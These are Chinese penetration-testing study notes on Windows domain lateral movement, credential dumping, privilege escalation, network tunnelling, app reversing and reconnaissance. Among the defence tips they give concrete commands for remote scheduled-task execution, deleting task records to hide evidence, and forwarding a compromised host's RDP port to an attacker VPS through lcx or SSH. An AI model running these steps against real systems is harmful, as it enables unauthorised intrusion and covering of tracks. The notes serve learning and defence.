作者： sigma

当拿到域中某台设备，骇客会以其为跳板横向渗透其他设备，最终获得所有设备权限。

一、常用windows远程连接

通常来说，我们在渗透测试要拿到的一些关键资源包括了目标计算机的用户明文密码或者NTLM Hash，通过PTH(pass the hash凭据传递)把得到的信息发送到目标机器进行验证，我们就获得了目标机器的使用权，建立连接后就能远程执行命令了。

1.IPC internet process connection

这是为了实现进程之间通信而开放的命名管道。通常在远程管理计算机和查看计算机的共享资源时使用。

ipc$：
利用条件：
（1）开启了139、445
（2）管理员开启默认共享

建立ipc$连接远程目标计算机
net use \\ipaddress\ipc$ “password” /user:username

查看当前链接
net use

2.使用windows自带的工具获取远程主机信息

(1)dir命令

建立了连接后，用dir查看文件列表：

dir \\ipaddress\c$

(2)tasklist命令

用来查看进程
tasklist /S address /U username /P password

3.计划任务

(1)at命令：

用于创建计划任务的命令，主要应用在windows server 2008之前。所以如果测试的计算机使用的os是符合条件的版本，那么可以使用at命令在远程目标机器创建计划任务：
·使用copyd命令将payload文件复制到远程目标计算机中
·使用at命令定时启动该payload文件
·删除使用at命令创建计划任务的记录 //抹去证据防止被查

上述需要先建立ipc$作为前提

下面是at命令使用过程：
①查看目标系统时间，攻击者很喜欢抹去或者修改文件的时间
net time \\ipaddress

②将文件复制到目标计算机中
先创建一个calc.bat文件，内容为“calc”（在运行界面输入calc会弹出计算器）。也就是说这一步的目的是为了让计算机在某一时刻启动计算器。
copy calc.bat \\ipaddress\C$
上述命令目的是把刚才的bat文件传到目标计算机的C盘

③使用at创建任务
知道目标系统的时间之后，指定程序在计划时间启动
at \\ipaddress 4:11PM C:\calc.bat
Added a new job with job ID 7
创建ID为7的计划任务，在下午4点11分运行C盘的calc.bat文件

④清除at记录
任务记录会一直存在，攻击者不想被网络管理员发现，就会抹去记录
at \\ipaddress 7 /delect
删除ID为7的任务

现将结果写在本地文件，然后用type远程读取该文件，如下：
at \\ipaddress 4.11PM cmd.exe /c “ipconfig >C:/1.txt”
然后用type远程读取：
type \\ipaddress \C$\1.txt

经过实际测试，at命令如果不键入远程ip地址就默认是在本地进行计划。并且注意，在windows vista和2008之后at命令被废弃，应该使用schtasks命令

(2)schtasks命令

①创建test计划任务，该计划在开机时启动C盘下的calc.bat，权限为system
schtasks /create /s ipaddress /tn test /sc onstart /tr c:\calc.bat \ru system /f

②远程执行
schtasks /run /s ipaddress /i /tn “test” /f

③删除ipc$
net use 名称 /del /y

使用schtasks命令，会在系统留下日志文件C:\Windows\Tasks\SchedLgU.txt

二、windows系统散列值获取

LM Hash、NTLM Hash是两种用户明文密码进行加密的方法。在域中，用户信息存储在 ntds.dit中

windows密码一般由两部分：LM hash和NTLM Hash组成，结构为：

username:RID:LM-HASH:NT-HASH

注意！win2008之后LM hash被禁用，此时抓取到的LM Hash的值为
“aad3b435b51404eeaad3b435b51404ee” //这就表示其为空值或被禁用

1.单机抓取

我们要知道只有SYSTEM权限能抓散列值或者明文密码，本地用户名、散列值和其他验证信息都存在SAM文件中。
而lsass.exe进程是用来windows的安全策略，攻击者会用工具从内存的lsass.exe进程或者SAN文件导出敏感信息

其中，SAM文件地址在：C:\Windows、System32\config. 攻击者再关闭windows操作系统后用PE盘进入文件管理环境，直接复制SAM文件 //？阿这我没太理解，也许是攻击者获取了物理设备能这么搞吧

【工具】GetPass、PwDump7、QuarksPwDump

下面是提取的思路

①通过SAM和System文件抓取密码

②使用mimikatz在线读取SAM文件

③使用mimikatz离线读取lsass.dump文件

④使用Powershell对散列值进行Dump操作

⑤使用Powershell远程加载mimikatz抓取散列值和明文密码

【防御】：
win2012 以及以后关闭了Wdigest，攻击者无法从内存获取明文密码
win2012以及之前的下载补丁 KB2871991也可以阻止获取明文密码

2.使用Hashcat获取密码

它可以使用GPU来对密码来进行破解

三、哈希传递攻击

哈希传递攻击pass the hash 。获取域中一个管理员账号密码，就相当于获得其他本地管理员的账号密码

注意，随着安全意识提高，windows sever 2012 R2之后，默认在内存中不会记录明文密码

四、票就传递攻击

mimikatz的哈希传递功能需要本地管理员权限。mimikatz也有不需要权限也能横向渗透的方法，比如票据传递（pass the ticket,PTT）

[防范]：
·使用dir的时候，使用主机名，不用IP地址
·票据文件注入内存的默认有效时间为10小时
·在目标机器上不需要本地管理员权限即可进行票据传递

五、PsExec

这个软件是win用来运维的，一般在杀软白名单里
运行在windows vista\2000\xp\server 2003\ server 2008\server 2012\server 2016

六、WMI

windows management instrumentation.从win98就开始支持，可以在本地或远程管理计算机

因为越来越多安全厂商吧PsExec加入黑名单，所以转而用这个技术进行横向渗透，还有一个重大原因是，使用WMI不会记录在系统日志。

八、smbexec

可以通过文件共享（admin$、c$、ipc$、d$）在远程计算机系统执行命令

九、DCOM在远程系统中使用

十、SPN在域环境中使用

十一、exchang、邮件服务器安全

介绍windows下四种权限：

1.User：普通用户权限，能做的事最少因此最安全

2.Administrator：管理员权限。可以提权到System级别操作SAM文件

3.System：系统权限，可以对SAM等敏感文件进行读取，对散列值进行Dump操作

4.TrustedInstaller：这是windows中最高级别权限。对于系统文件能进行修改

提权方法：
1.纵向提权：低等级权限获得高权角色权限

2.横向提权：获取另一个和当前权限一样的角色的权限

常用提权方法：系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、web中间件漏洞提权、DLL劫持提权、滥用高权限令牌提权、第三方服务/软件提权等

一、系统内核溢出漏洞提权
参考复现DC-1靶场利用漏洞的思路方法

二、windows配置错误

常见利用：管理员凭据错误、服务配置错误、故意削弱的安全措施、用户权限过高

(1)、系统服务权限配置错误

(2)、注册表键AlwaysInstallElevated

(3)、可信任服务路径漏洞

该漏洞：包含空格并且没有被引号包裹，让存在缺陷的服务程序利用了属于可执行文件/文件夹的权限

如果一个服务的可执行文件的路径没有被双引号包起来并且含有空格，那么这个服务是有漏洞的！

原因：windows服务以system权限运行，系统解析服务对应的文件路径中的空格也会是以系统权限进行，那么对于路径中每一个空格，windows会找到并且执行与空格前面名字相匹配的程序。

直白的说，黑客配合文件上传漏洞，或和上传功能，将恶意程序上传到特殊路径，然后利用某个服务的漏洞修改服务的可执行文件的路径，也就是把恶意文件的路径加入其中，那么当服务重启，windows就会以系统权限执行恶意程序。

思路：metasploit下

1，查看是否存在可以利用的漏洞,输入下面命令能看到没有被引号包围的服务的路径
wmic service get name,displayname,pathname,startmode | findstr /i “Auto” |findstr /i /v “C:\Windows\\” | findstr /i /v “””

2.如果发现有含空格的路径，说明有漏洞，那么下面就是检测是否对目标文件夹有“写”的权限。使用工具“icacls”检查刚才得到的含有空格的路径。
权限：
·Everyone：所有用户都能修改
·(M)：修改
·(F)：完全控制
·(CI)：从属容器将继承访问控制项
·(OI)：从属文件将继承访问控制项

3.发现了漏洞并且能写入，就要修改路径并且重启服务了：
sc stop service_name
sc start service_name

(4)、自动安装配置文件

管理员配置多个设备会使用脚本，有时候会泄露账号密码

(5)、计划任务

查看计划任务：schtasks /query / fo LIST /v

(6)Empire内置模块

三、组策略首选项提权

SYSVOL是一个共享文件夹，它在活动目录AD里用于存储公共文件服务器副本，在域中的所有域控制器DC之间进行复制，自动同步以及共享。
所有组策略放在：C:\Windows\SYSVOL\DOMAIN\Policies\目录中

存在这么一种情况：所有的机器的本地管理员密码是相同的（有些人他就是不记得修改默认密码），也就是得到一台机子密码就得到所有管理员密码了。

【防御】2014微软修复该漏洞，不再将密码保存在组策略首选项中
·设置共享文件夹SYSVOL的访问全新啊
·把包含组策略密码的XML文件从SYSVOL目录中删除
·不要把密码放在所有域用户都有访问权限的文件中
·更改本地管理员密码

四、绕过UAC提权

对于版本比windows vista更高级别的os，如果权限不够，访问系统磁盘的根目录、windows目录、program files 目录、以及进行读写系统登录数据库（registry）的程序等操作，都需要经过UAC(user account control,用户账户控制)的认证

在win10很常见试图修改某些东西的时候都是会弹窗通知的，UAC有四种要求：
1.始终通知
2.仅在程序试图更改我的计算机的时候通知我
3.仅在程序试图改变我的计算机的时候通知我，但是不改变桌面亮度
4.从不提示

【防御】不让内网机器的使用者拥有本地管理员权限

五、令牌窃取

首先token是方便验证身份不用总是输入账号密码，但是如果token被别人获取，那么他人就可以冒充身份访问资源。

令牌产生是随机的不可预测的。

1.访问令牌(access token)：代表访问控制操作主体的系统对象

2.密保令牌(security token):也叫认证令牌、硬件令牌，物理设备

3.会话令牌(session token)：交互会话中唯一标识

【防御】：
1.对令牌时效性限制
2.加密令牌
3.使用加密链路SSL、TSL传输防止令牌被窃取

六、无凭证条件下的权限获取

两个概念：LLMNR、NetBIOS欺骗攻击

1.LLMNR本地链路多播名称解析
当DNS不能用，DNS客户端就会启用LLMNR解析本地网段中机器的名称，查询范围仅限于本地子网

2.NetBIOS
是一种网络协议，一般在由十几台计算机组成的局域网中，不支持IPv6

·NetBIOS-NS（名称服务）：用于名称注册和解析，以启用会话和分发数据包，需要用域名服务器来注册NetBIOS的名称。默认监听UDP137端口

·datagram distribution service（数据包分发服务）：无连接服务。负责进行错误检测和恢复，默认监听UDP138端口

·session service(会话服务)：允许两台计算机建立连接提供错误检测和恢复，默认使用TCP 139端口

Net-NTLM Hash

NTLM Hash 用来保存win用户的密码散列值，保存在SAM文件（所以才要足够高的权限才能拿）或者NTDS.DIT数据库中。
Net-NTLM Hash：是网络中经过NTLM认证的散列值。挑战/响应验证中“响应”包含了Net-NTLM Hash。

工具：responder //可以监听LLMNR和NetBIOS

学习目标：学会搜集小程序的外在资产信息；搜集app的外在、内在资产信息

使用的工具：AppinfoScanner、安卓修改大师

本篇文章做实验的方式整理思路
实验平台：逍遥模拟器、windows10
实验工具：AppinfoScanner、安卓修改大师

实现过程：

一、app内在资源，分析源码

1.启动逍遥模拟器

2.AppinfoScanner原理是分析源码，在工具路径运行脚本，分析test.apk

我的环境配置少了某个包，运行失败。预期结果是能反编译出所有文件的。

3.打开安卓修改大师

4.打开测试用的apk文件，可以看到能进行的操作

安装好java环境之后让它反编译test.apk

分析出结果可以看到应用的信息，之后可以修改文件，做到替换里面的资源或者修改应用的权限。

下图的权限让我们思考，以前的那些o泡事件其实很多都是修改了手机的权限导致用户失去对手机的控制

看左边的功能，我们还可以到处java代码，放到自己的ide里面进行修改。在进行信息搜集时，我们可以通过像下图一样的搜索信息，查找一些接口，url等，进行下一步的分析

通过这个工具，我们可以做到搜索某些信息，修改这些信息，再打包（重新编译）。例如某个功能限制次数，我们反编译之后找到该功能代码，修改之后重新编译。

二、app外在资源

1.对app进行抓包，在之前讲过，工具用fiddler，不用bp是因为bp有些协议抓不了。开启抓包，打开apk，工具会记录操作过程中的数据交互情况

2.分析抓到的数据，有些数据可能是从cdn来的，要能判断所需真实信息，找到我们目标的ip地址，用WEB思路来进行搜集信息，比如进行端口扫描看开放的服务

3.当又遇到抓不到包的情况，我们就需要使用封包的思路来解决，因为可能存在壳，要先脱壳再编译。那么我们可以用工具看看有没有加壳，如下图，使用查壳工具打开test.apk.另外对于没有安装包的应用，还可以用工具【APK资源提取器】先把安装包apk文件提取出来，再放在查壳工具看。

封包工具 把数据流量用数据包封装达到检测每一步操作的效果

4.Xposed 框架

以后学

隐藏通信信息隧道技术用于在访问受限的网络环境中追踪数据流向和在非受信任的网络中实现安全的信息传输。

咱也就是说这是进内网了留个通道传数据

常用隧道：
网络层：IPv6隧道、ICMP隧道、GRE隧道
传输层：TCP隧道、UDP隧道、常规端口转发
应用层：SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道

一、判断内网连通外网情况
通过多种协议判断，常见允许流量出站端口号：80、8080、443、53、110、123等

1.ICMP协议
用内网机器ping外网ip

2.TCP协议
实用工具NC，也就是之前文章使用过的“军刀”，在内网机器下载nc，执行：
nc -zv ipaddress portnumber

3.HTTP协议
使用工具 curl
linux：系统自带。
windows：需要下载。
用法： curl ipaddress:portnumber

4.DNS协议
常用命令：nslookup、dig
nslookup(windows自带):nslookup ipaddress vps-ip
dig(linux自带):dig @vps-ip ipaddress

当流量不能直接出站，就需要在内网中使用代理服务器
a.查看网络连接，是否存在与其他机器的8080等端口的连接（可运行 ping -n l -a ip）
b.查看内网主机名有无带“proxy”的机器
c.查看浏览器的直接代理
d.根据pac文件的路径（可能是本地可能是远程）将其下载查看
e.用工具：curl ipaddress //不通
curl -x proxy -ip:port ipaddress //通

二、网络层隧道技术

最常用IPv6和ICMP

1.IPv6隧道
以IPv4作为隧道载体，把IPv6报文封装在IPv4报文内部，使IPv6报文能够传递。
目前很多边界设备、防火墙、IPS、IDS无法识别IPv6的通信数据，而大多数操作系统支持IPv6，所以需要进行人工配置。也就是说，攻击者可以利用和一点来绕过安全设备。

隧道技术有配置隧道和自动隧道，区别在于：
只有执行隧道的节点的IPv6地址是IPv4兼容地址时，自动隧道才是可行的。

配置隧道要求隧道末端节点使用其他机制获取IPv4地址

支持IPv6的隧道工具：socat、6tunnel、nt6tunnel等

【防御】：了解ipv6的具体漏洞，用防火墙和纵深防御来过滤ipv6通信

2.ICMP隧道
常用ICMP隧道工具：icmpsh、PingTunnel、icmptunnel、power shell icmp等

【防御】：由于使用ICMP隧道会产生大量ICMP报文，可以通过检测来分析流量
·检测来自同一来源的ICMP报文。ping一般每秒最多发2个数据包，但使用ICMP隧道的浏览器会产生上千ICMP数据包
·注意payload大于64bit的ICMP数据包
·寻找响应数据包中的payload与请求包的payload不一致的ICMP数据包
·检查ICMP数据包的协议标签。例如，icmptunnel会在所有ICMP payload前添加“TUNL”

三、传输层隧道

当内网防火墙阻止对指定端口访问，在获取目标机器之后，可以使用IPTABLES打开指定端口(linux)

1.lcx端口转发
lcx是最经典的端口转发工具，它基于socket套接字实现端口转发。
在windows版本：lcx.exe
在linux版本：portmap

内网端口转发
（1）使用命令把目标机器3389端口所有数据转发到公网VPS的4444端口上：
lcx.exe -slave 公网ipaddress 4444 127.0.0.1 3389

（2）在VPS这台机器执行命令，把本机4444端口监听到的的数据转发到5555端口
lcx.exe -listen 4444 5555

（3)用 mstsc 连接远程桌面。用mstsc登录 公网ipaddress：5555，或者在VPS用mstsc登陆主机127.0.0.1：5555，用这两种方式访问目标服务器3389端口

本地端口映射
若防火墙把3389ban了不给过，此时可以将目标服务器的相应端口的数据透传到防火墙允许的端口，比如转到53。在目标主机执行，允许远程连接目标主机的53端口
lcx -tran 53 目标主机ipaddress 3389

2.netcat
之前实验用过netcat，可以查看以前文章
此处说明一下在内网环境，如果我们获取了web服务器权限，但是从外网无法直接访问其他内网服务器，就可以把web服务器作为代理服务器，反弹shell。这样的思路叫做内网代理。

四、应用层隧道技术

应用软件提供的端口来发送数据

1.ssh协议

【本地转发】
因为大部分防火墙都会通过ssh所以很多时候黑客会利用ssh协议传输数据
类似的，一般都用内网中被控制的机器作为跳板，去访问其他机器。
ssh -CfNg -L 1111(黑客机port) : 1.1.1.1(目标机器) :3389(目标port) root@192.168.1.11(跳板机)
然后输入跳板机密码，就实现了黑客机连接目标主机。也就是说这是通过web来访问目标机3389

用命令查看连接情况：
netstat -tulnp | grep “1111” //查看端口监听情况
rdesktop 127.0.0.1:1111 //在黑客机看1111情况

【远程转发】
有种情况，黑客机不能访问内网，但是内网中的web服务器可以访问外网，那么，我们可以通过web服务器让黑客机的数据转发到目标机的3389端口。
在我们获取的web服务器输入：
ssh -CfNg -R 2222(黑客机port) : 1.1.1.10(目标主机) :3389 root@192.168.1.4(黑客机)

【本地转发和远程转发】
本地转发，黑客机的指定端口接收远程主机（目标机）某个端口的数据
远程转发，黑客机利用ssh隧道，将所有访问远程主机（目标机）指定端口的数据传到本机对应端口

【动态转发】
动态端口映射是建立一个ssh加密的socks 4/5代理通道

【防御】：
设置白名单，指定ip才能连ssh

2.HTTP、HTTPS协议

【用处】HTTP Service代理用于将所有流量转发到内网。

【工具】reGeorg、meterpreter、tunna等

【意义】使用HTTP隧道进行端口转发，不仅攻击者可以直接访问web服务器3389，而且暴力破解产生的流量特征不明显。所以我们平时维护要注意监控HTTP隧道情况

3.DNS协议

【用处】激增的DNS流量可能会被发现，但是基于传统的Socket隧道已经濒临淘汰。DNS、ICMP、HTTP/HTTPs由于难以被禁用，成为了攻击者控制隧道的主流渠道

为啥？因为你要域名解析就要用DNS，注意的是防火墙和入侵检测大都不会过滤掉DNS流量，DNS报文本身可以说是有穿透防火墙的能力

C&C服务器（command and control server）
用于管理僵尸网络以及进行APT攻击的服务器，分为：服务端（攻击者）—客户端（被控制的计算机）
C&C通信：植入C&C客户端的木马或者后门程序与C&C服务端上的远程控制程序之间的通信

DNS隧道技术其实用来实现C&C通信的，DNS解析预期返回一个ip地址，但是注意，返回的可以是任意字符串，包括加密的C&C指令。DNS隧道原理就是用DNS报文封装其他协议报文

使用DNS隧道的思路：
（1）查看DNS连通性
查看当前服务器是否允许通过内部DNS解析外部域名
cat /etc/resolv.confi|grep -v ‘#’ //查询当前内部域名和ip地址
nslookup hacke.testlab //查看能否与内部DNS通信
nslookup baidu.com //查看能否通过内部DNS服务器解析外部域名

（2）工具

dnscat2：

该工具使用DNS协议创建加密的C&C通道，通过预共享密钥进行身份验证。
两个模式：直连模式、中继模式

iodine：kali内置

【防御】：
·禁止网络中任何人向外部服务器发送dns请求，只允许与受信任的DNS服务器通信
·将邮件服务器、网关列入白名单并阻止传入和传出流量的TXT请求
·跟踪用户的DNS查询次数
·阻止ICMP

五、SOCKS代理

socks4：仅支持TCP协议
socks5：除了TCP,还支持各种身份验证机制，标准端口为 1080

socks能实现与目标内网计算机进行通信，避免多次端口转发

[工具]：EarthWorm、reGeorg、Socks、SocksCap64、Proxifier、ProxyChains

六、压缩数据

【意义】传得快

【工具】RAR、7-Zip

七、上传下载

假设情况不能上传shell但是可以执行命令的windows服务器，可以在shell命令行环境中对目标服务器进行上传和下载。

上传：
1.利用FTP
2.利用VBS
3.利用Debug
4.利用Nishang

下载：
1.利用bitsadmin
2.利用powershell

不懂就百度

一、可以通过审查知道的内容

1.网站使用的语言
F12审查网页，看看引用的包的后缀，比如引用php文件那么就用的php写的文件；
从审查network处抓包查看返回报文，能看到诸如中间件的信息；

2.网站操作系统
输入index.php,通过改变大小写，linux对大小写敏感；
ping，64或255一般是linux；128一般是win；如果ttl不是特殊的数字就看离哪个近；
端口扫描一扫也能知道；

3.数据库语言
百度一下最佳组合，比如问php跟apache跟什么数据库最合适；

4.通过查询备案信息

5.通过security.R1nG网站中，【全部】处可以找到信息搜集的一些网站，知识，思路。链接在之前的文章有。

二、利用其它思路获取信息

1.burp suit抓包，看是不是走的网络协议，具体抓包方式以前写的文章有。观察网址的变化，找到奇怪的网址然后保存它发送到repeater，对这个网站发送接收信息。也可以在网址访问该网站

2.百度端口扫描，扫那个坏网站，看到开放的的端口然后进行判断

网站源码获取

源码泄露；资源监控；
比如GitHub gitee上可能有人分享公司的代码。

为什么说PHP是世界上最好的语言？漏洞多

源码泄露的原因：
1.源码本身的特性入口
2.管理员不好的习惯
3.管理员不好的配置
4.管理员不好的意识
5.管理员资源信息搜集

1.cms
使用云悉指纹识别平台。为啥有些识别不出来，因为它们用的不是已知的开源的cms
识别的意义：找已知漏洞

2.备份文件
使用工具：7kb，扫描网站的一些目录，找到备份文件。能找到是因为管理员不好的习惯，没有抹去或者改变默认的信息。同时如果在错误的路径(目录)备份，备份文件就可能被扫出来，进而知道整个源码

3.配置不当-github泄露
程序员使用github或者gitee平台同步自己编写的代码。如果上架前不删除”.git”目录，可以通过这个目录来复原。
工具：githack（python2环境）

4.php特性
例如在网址输入：composer.json看到有使用框架的使用的具体技术

输入

服务器厂商信息：

外网ip怎么转到内网的？
通过网关或者路由器，添加端口映射，比如添加192.168.1.13，端口80(外)、80(内)这个映射，达到外放访问公网ip的80端口会跳转到内网ip的80端口

端口扫描工具：
masscan（快）
nmap
关于端口扫描，以前文章写有

waf识别：
csdn有相关文件

负载均衡识别：其实负载均衡也可以理解成cdn那样，在实训的时候我曾经用tomcat实现负载均衡

---

2025新信息搜集

一、主机信息搜集

1、操作系统：

①WEB大小写区分操作系统（windows区分大小写，linux不区分）

②端口服务特征（windows3389，linux22）

③TTL判断（windows比较大，linux比较小）

2、IP：

①归属地查询

②归属云厂商

③IP反查机构

④IP反查域名

微步查询、站长之家、fofa

⑤IPc段查询

fofa

3、端口：

①网络资产引擎：fofa、hunter、quake、00信安

②工具：

nmap：最准，但是最慢

masscan：最快，误报高

无影

扫描会遇到的问题导致扫描不准确:

①扫描不到：防火墙策略、白名单策略等

绕过：

换协议扫描 //几率跳过，比如只限制了tcp没限制udp

②扫描不准：网站在内网经过中转，扫描的ip是转发的设备不是真实资产

绕过：

漏洞反连

4、判断资产属性：

1）网站服务器

2）数据库服务器

3）邮件系统服务器

4）文件存储服务器

5）网络通信服务器

6）安全系统服务器

标签	名称	地址
企业信息	天眼查	https://www.tianyancha.com/
企业信息	小蓝本	https://www.xiaolanben.com/
企业信息	爱企查	https://aiqicha.baidu.com/
企业信息	企查查	https://www.qcc.com/
企业信息	国外企查	https://opencorporates.com/
企业信息	启信宝	https://www.qixin.com/
备案信息	备案信息查询	http://www.beianx.cn/
备案信息	备案管理系统	https://beian.miit.gov.cn/
注册域名	域名注册查询	https://buy.cloud.tencent.com/domain
IP反查	IP反查域名	https://x.threatbook.cn/

标签	名称	地址
DNS数据	dnsdumpster	https://dnsdumpster.com/
证书查询	CertificateSearch	https://crt.sh/
网络空间	FOFA	https://fofa.info/
网络空间	全球鹰	http://hunter.qianxin.com/
网络空间	360	https://quake.360.cn/quake/
威胁情报	微步在线 情报社区	https://x.threatbook.cn/
威胁情报	奇安信 威胁情报中心	https://ti.qianxin.com/
威胁情报	360 威胁情报中心	https://ti.360.cn/#/homepage
枚举解析	在线子域名查询	http://tools.bugscaner.com/subdomain/
枚举解析	DNSGrep子域名查询	https://www.dnsgrep.cn/subdomain
枚举解析	工具强大的子域名收集器	https://github.com/shmilylty/OneForAll

标签	名称	地址
网络空间	钟馗之眼	https://www.zoomeye.org/
网络空间	零零信安	https://0.zone/
网络空间	Shodan	https://www.shodan.io/
网络空间	Censys	https://censys.io/
网络空间	ONYPHE	https://www.onyphe.io/
网络空间	FullHunt	https://fullhunt.io/
网络空间	Soall Search Engine	https://soall.org/
网络空间	Netlas	https://app.netlas.io/responses/
网络空间	Leakix	https://leakix.net/
网络空间	DorkSearch	https://dorksearch.com/
威胁情报	VirusTotal在线查杀平台	https://www.virustotal.com/gui/
威胁情报	VenusEye 威胁情报中心	https://www.venuseye.com.cn/
威胁情报	绿盟科技 威胁情报云	https://ti.nsfocus.com/
威胁情报	IBM 情报中心	https://exchange.xforce.ibmcloud.com/
威胁情报	天际友盟安全智能平台	https://redqueen.tj-un.com
威胁情报	华为安全中心平台	https://isecurity.huawei.com/sec
威胁情报	安恒威胁情报中心	https://ti.dbappsecurity.com.cn/
威胁情报	AlienVault	https://otx.alienvault.com/
威胁情报	深信服	https://sec.sangfor.com.cn/
威胁情报	丁爸情报分析师的工具箱	http://dingba.top/
威胁情报	听风者情报源 start.me	https://start.me/p/X20Apn
威胁情报	GreyNoise Visualizer	https://viz.greynoise.io/
威胁情报	URLhaus 数据库	https://urlhaus.abuse.ch/browse/
威胁情报	Pithus	https://beta.pithus.org/

5、域名：

①、备案信息

通过域名查备案信息，备案信息获取更多域名

②、企业产权

通过企业产权查询Web,APP,小程序等版权资产

③、域名相关性

Whois信息：例如域名所有人、域名注册商、邮箱等。

通过域名注册接口获取后缀 //关注点是否有抢注

查询域名注册邮箱

通过域名查询备案号

通过备案号查询域名

反查注册邮箱

反查注册人

通过注册人查询到的域名在查询邮箱

通过上一步邮箱去查询域名

查询以上获取出的域名的子域名

6、子域名：

在后续测试中，还要注意对子域名进行筛选整理，太多的垃圾子域名和没用的子域名，主要看你的收集的子域名方法决定。

①、DNS数据

以DNS解析历史记录查询域名资产

②、证书查询

以SSL证书解析查询域名资产

③、网络空间

多网络空间综合型获取的记录

④、威胁情报

各类接口的集成的记录

⑤、枚举解析

结果主要以字典决定

https://github.com/knownsec/ksubdomain

https://github.com/shmilylty/OneForAll

---

指纹识别：

#Web架构

开源CMS：

Discuz、WordPress、PageAdmin、蝉知等

前端技术：

HTML5、Jquery、Bootstrap、Vue、NodeJS等

开发语言：

PHP、JAVA、Ruby、Python、C#、JS、Go等

框架组件：

SpringMVC、Thinkphp、Yii、Tornado、Vue等

Web服务器：

Apache、Nginx、IIS、Lighttpd等

应用服务器：

Tomcat、Jboss、Weblogic、Websphere等

数据库类型：

端口扫描，组合判断，应用功能

Mysql、SqlServer、Oracle、Redis、MongoDB等

操作系统信息：

Linux、Windows、Mac等

应用服务信息：

FTP、SSH、RDP、SMB、SMTP、LDAP、Rsync等

CDN信息：

帝联、Cloudflare、网宿、七牛云、阿里云等

WAF信息：

创宇盾、宝塔、ModSecurity、玄武盾、OpenRASP等。

蜜罐信息：

HFish、TeaPot、T-Pot、Glastopf等

其他组件信息：

FastJson、Shiro、Log4j、Solr、XStream等

#指纹识别：

1、平台：

https://www.yunsee.cn/ //使用云悉扫网站，识别cms信息等

http://finger.tidesec.net/

https://fp.shuziguanxing.com

2、谷歌插件：wappalyzer

3、网页图标：fofa、quake

---

源码泄露

参考文章：

https://www.secpulse.com/archives/124398.html

https://mp.weixin.qq.com/s/QgLDdaefXlZtvlSiFQShZw

https://mp.weixin.qq.com/s/zhjxW2mUEgq6dFAp3kBcgQ

泄漏点:

1、webpack打包泄露

2、composer.json

php的第三方依赖

3、github源码泄露

4、git源码泄露：

在url最后加上.git查看是否有泄露，然后运行githack.py下载泄露的文件（python2.7）

5、svn源码泄露

在url最后加上.svn查看是否有泄露，然后运行Svnhack下载泄露文件（python2.7)

6、网站备份压缩文件（xxx.zip xxx.rar）

7、DS_Store文件泄露

这是MAC系统下的用来保存展示文件/文件夹的数据文件，每个文件夹下对应一个，可能造成文件目录结构泄露，特别是备份文件、源代码等，低危。若发现某个路径下有.Ds_Store,使用ds_store_exp进行恢复，可能能还原目录结构。

8、hg源码泄露

9、SWP文件泄露（少见）

10、CVS泄露

11、Bzr泄露（少见）

12、WEB-INF/web.xml泄露

检查源码泄露的工具：

通用：https://github.com/0xHJK/dumpall

GIT：https://github.com/lijiejie/GitHack

SVN：https://github.com/callmefeifei/SvnHack

DS_Store：https://github.com/lijiejie/ds_store_exp

webpack打包：https://github.com/NothingCw/SourceDetector-dist

使用github搜索泄露情况：

①F12检查网页代码中的敏感js，到github上搜。

资源搜索语法：

in:name test #仓库标题搜索含有关键字

in:descripton test #仓库描述搜索含有关键字

in:readme test #Readme文件搜素含有关键字

stars:>3000 test #stars数量大于3000的搜索关键字

stars:1000..3000 test #stars数量大于1000小于3000的搜索关键字 forks:>1000 test #forks数量大于1000的搜索关键字

forks:1000..3000 test #forks数量大于1000小于3000的搜索关键字 size:>=5000 test #指定仓库大于5000k(5M)的搜索关键字 pushed:>2019-02-12 test #发布时间大于2019-02-12的搜索关键字 created:>2019-02-12 test #创建时间大于2019-02-12的搜索关键字 user:test #用户名搜素

license:apache-2.0 test #明确仓库的 LICENSE 搜索关键字 language:java test #在java语言的代码中搜索关键字

user:test in:name test #组合搜索,用户名test的标题含有test的

关键字配合谷歌搜索：

site:Github.com smtp

site:Github.com smtp @qq.com

site:Github.com smtp @126.com

site:Github.com smtp @163.com

site:Github.com smtp @sina.com.cn

site:Github.com smtp password

site:Github.com String password smtp

JS信息搜集

0、JS信息收集

接口URL提取

后端地址提取

敏感信息提取

配置信息提取

其他信息提取（环境，注释，用途等）

1、JS安全问题

源码泄漏，代码审计，JS逆向分析

未授权访问=JS里面分析更多的URL访问确定接口路径

敏感Key泄漏=JS文件中配置接口信息（云应用，短信，邮件，数据库等）

API接口安全=（代码中加密提交参数传递，更多的URL路径）

2、流行的Js框架有那些？

Vue NodeJS jQuery Angular等

3、如何判定JS开发应用？

插件wappalyzer

源程序代码简短

引入多个js文件

一般有/static/js/app.js等顺序的js文件

一般cookie中有connect.sid

4、如何获取更多的JS文件？

手工-浏览器搜索

半自动-Burpsuite插件

工具化-各类提取&FUZZ项目

5、如何快速获取价值信息？

src=

path=

method:”get”

http.get(“

method:”post”

http.post(“

$.ajax

http://service.httppost

http://service.httpget

标签	名称	地址
FUZZ测试	ffuf（好用）	https://github.com/ffuf/ffuf
匹配插件	Hae	https://github.com/gh0stkey/HaE
JS提取	JSFinder（弃用）	https://github.com/Threezh1/JSFinder
JS提取爬虫	URLFinder（比上面的好用）	https://github.com/pingc0y/URLFinder
WebPack分析	Packer-Fuzzer	https://github.com/rtcatc/Packer-Fuzzer
JS匹配插件	BurpAPIFinder（bp插件，相当推荐）	https://github.com/shuanx/BurpAPIFinder
JS提取	LinkFinder	https://github.com/GerbenJavado/LinkFinder
WebPack分析	jjjjjjjjjjjjjs(好用）	https://github.com/ttstormxx/jjjjjjjjjjjjjs
JS提取爬虫	FindSomething（好用）	https://github.com/momosecurity/FindSomething
JS匹配插件	Unexpected_information	https://github.com/ScriptKid-Beta/Unexpected_information
FUZZ字典	字典集合	https://wordlists.assetnote.io

步骤：

1、F12检查中的“源代码/来源”处，找到一些JS文件然后搜一些关键词，如搜“src=”，如“$.ajax”等，发现接口能上传就考虑文件上传，能无密码访问就是未授权。

2、通过URLFinder等工具、插件找敏感信息。

3、遇到webpack打包器的，使用jjjjjjjjjjjjjjjjjjs下载分析。

---

cdn

cdn配置:

1、加速域名：

加速的域名若没包括子域名，则访问子域名是真实资产。如只加速了www.baidu.com没加速blog.baidu.com，此时解析blog.baidu.com获取真实ip

2、加速区域：

可以选择仅中国内地；全球；全球（不包含中国内地） //若没有加速国外，则使用除了内地外的ip去ping能ping到真实ip，但目前国内运营商加上了中间设备进行多次跳转，该方法失效。

3、加速资源：

可以选择加速文件类型，如

4、加速证书：

证书记录-SSL查域名解析记录，获取真实ip

